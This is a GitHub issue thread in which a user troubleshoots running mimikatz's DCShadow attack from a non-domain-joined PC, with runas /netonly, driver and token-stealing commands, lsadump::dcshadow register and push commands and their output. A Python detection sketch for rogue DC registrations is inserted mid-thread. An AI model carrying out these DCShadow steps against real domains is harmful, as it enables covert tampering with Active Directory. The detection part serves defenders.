
Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack #423

Open
rick-engle opened this issue Mar 16, 2023 · 8 comments

Comments


rick-engle commented Mar 16, 2023

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context:
```
mimikatz # token::whoami
 * Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-xxxxx (04g,30p) Primary
 * Thread Token  : no token
```

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context.
Is there a way to do this?

Thanks.


picheljitsu commented Mar 17, 2023 via email

rick-engle (Author) commented

I did try that but unfortunately I get this error:
```
C:\temp>runas /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
Enter the password for mydomain.com\badadmin:
Attempting to start C:\Attackfolder\x64\mimikatz.exe as user "mydomain.com\badadmin" ...
RUNAS ERROR: Unable to run - C:\Attackfolder\x64\mimikatz.exe
1787: The security database on the server does not have a computer account for this workstation trust relationship.
```

gentilkiwi (Owner) commented

/netonly

rick-engle (Author) commented

Hi @gentilkiwi , That command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with:
```
runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami
 * Process Token : {0;0057a282} 2 L 5743378 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
 * Thread Token  : no token
```

gentilkiwi (Owner) commented

The netonly is ... network only.
If all is ok, you'll see the correct user in a network capture, e.g.

rick-engle commented Mar 17, 2023

Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1

```
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # !processtoken
Token from process 0 to process 0
 * from 0 will take SYSTEM token
 * to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
 * to 4976/cmd.exe
 * to 5704/mimikatz.exe
 * to 2844/mimikatz.exe

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!"
** Domain Info **

Domain: DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635132

** Server Info **

Server: DC1.mydomain.com
  InstanceId  : {52021f09-72f2-4471-9114-9e582b9c071c}
  InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Attributes checking **

#0: Description

** Objects **

#0: jeffl
DN:CN=JeffL,CN=Users,DC=mydomain,DC=com
  Description (2.5.4.13-d rev 1):
    My new cool description is swell!
    (4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)

** Starting server **

 > BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196]
 > RPC bind registered
 > RPC Server is waiting!
== Press Control+C to stop ==
```

Mimikatz session #2
Launch with:

```
runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami
 * Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
 * Thread Token  : no token

mimikatz # lsadump::dcshadow /push
ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com
** Domain Info **

Domain: DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635133

** Server Info **

Server: DC1.mydomain.com
  InstanceId  : {52021f09-72f2-4471-9114-9e582b9c071c}
  InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Performing Registration **

** Performing Push **

Syncing DC=mydomain,DC=com
Sync Done

** Performing Unregistration **
```
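The session #2 output above shows the shape a defender can key on: the non-domain-joined host ATTACKER-EXT is registered as a domain controller in the Configuration partition ("Performing Registration"), a replication push happens, and the registration is removed again seconds later ("Performing Unregistration"). A real DC promotion never tears itself down like that. The following detection sketch is an added example, not code from this thread or from mimikatz. It assumes Windows Security auditing of directory service changes is producing event 5137 (directory service object created) and 5141 (directory service object deleted) records; the event records, the DC allowlist and the timestamps below are constructed for mydomain.com, and the field layout of `DsChangeEvent` is an assumption about how a SIEM would normalize those events.

```python
"""
Detection sketch for the DCShadow register/push/unregister sequence.
Added example; not mimikatz code. Event records are constructed to mimic the
fields of Windows Security events 5137 (object created) and 5141 (object
deleted) for objects in the Configuration naming context.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class DsChangeEvent:
    event_id: int        # 5137 = object created, 5141 = object deleted
    timestamp: datetime
    object_class: str    # LDAP class of the touched object, e.g. "nTDSDSA"
    object_dn: str       # distinguished name of the touched object
    subject: str         # account that performed the change


def server_name_from_dn(dn: str) -> Optional[str]:
    """Return the server RDN value for a DN below a CN=Servers container,
    e.g. 'CN=NTDS Settings,CN=ATTACKER-EXT,CN=Servers,<site>,...' -> 'ATTACKER-EXT'.
    Returns None for DNs that are not under CN=Servers."""
    rdns = [part.strip() for part in dn.split(",")]
    for i, rdn in enumerate(rdns):
        if rdn.upper() == "CN=SERVERS" and i > 0 and rdns[i - 1].upper().startswith("CN="):
            return rdns[i - 1].split("=", 1)[1]
    return None


def find_rogue_dc_registrations(events, known_dcs, max_lifetime=timedelta(minutes=15)):
    """Return one alert per nTDSDSA object created for a server that is not in
    known_dcs. If the same object is deleted within max_lifetime, the alert also
    records how long the fake DC existed: a short-lived registration followed
    by deletion is the DCShadow signature, not a genuine promotion."""
    known = {name.upper() for name in known_dcs}
    pending = {}   # server name (upper) -> alert dict awaiting a matching 5141
    alerts = []
    for ev in sorted(events, key=lambda e: e.timestamp):
        if ev.object_class.lower() != "ntdsdsa":
            continue                     # only DC registrations matter here
        server = server_name_from_dn(ev.object_dn)
        if server is None or server.upper() in known:
            continue                     # not a server object, or an allowlisted DC
        key = server.upper()
        if ev.event_id == 5137:
            alert = {"server": server, "subject": ev.subject,
                     "registered_at": ev.timestamp, "lifetime_seconds": None}
            pending[key] = alert
            alerts.append(alert)
        elif ev.event_id == 5141 and key in pending:
            alert = pending.pop(key)
            delta = ev.timestamp - alert["registered_at"]
            if delta <= max_lifetime:
                alert["lifetime_seconds"] = int(delta.total_seconds())
    return alerts


# Constructed sample data mirroring the thread's domain and host names.
SITE = "CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com"
T0 = datetime(2023, 3, 17, 10, 0, 0)
SAMPLE_EVENTS = [
    # legitimate promotion of DC2, which is on the allowlist: no alert
    DsChangeEvent(5137, T0, "nTDSDSA",
                  f"CN=NTDS Settings,CN=DC2,{SITE}", "MYDOMAIN\\DC2$"),
    # the session #2 pattern: ATTACKER-EXT shows up as a DC ...
    DsChangeEvent(5137, T0 + timedelta(minutes=5), "nTDSDSA",
                  f"CN=NTDS Settings,CN=ATTACKER-EXT,{SITE}", "MYDOMAIN\\badadmin"),
    # ... and is gone again 40 seconds later, right after the push
    DsChangeEvent(5141, T0 + timedelta(minutes=5, seconds=40), "nTDSDSA",
                  f"CN=NTDS Settings,CN=ATTACKER-EXT,{SITE}", "MYDOMAIN\\badadmin"),
    # unrelated change in the same partition: ignored
    DsChangeEvent(5137, T0 + timedelta(minutes=6), "siteLink",
                  "CN=NewLink,CN=IP,CN=Inter-Site Transports,CN=Sites,CN=Configuration,DC=mydomain,DC=com",
                  "MYDOMAIN\\netadmin"),
]
KNOWN_DCS = ["DC1", "DC2"]

if __name__ == "__main__":
    for alert in find_rogue_dc_registrations(SAMPLE_EVENTS, KNOWN_DCS):
        print(alert)
```

Events 5137 and 5141 only appear when the "Audit Directory Service Changes" subcategory is enabled and the Configuration naming context carries a SACL for object creation and deletion; without that, the registration in session #2 leaves nothing in the Security log and this check fires on nothing. The allowlist is the other weak point: maintain it from the real `nTDSDSA` objects, not from DNS, since the fake server in the thread already has a mydomain.com name.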


picheljitsu commented Mar 18, 2023 via email

bbhorrigan commented

This seems like you are having network issues reading thru this, because I can't imagine this not being related to some type of network issue.
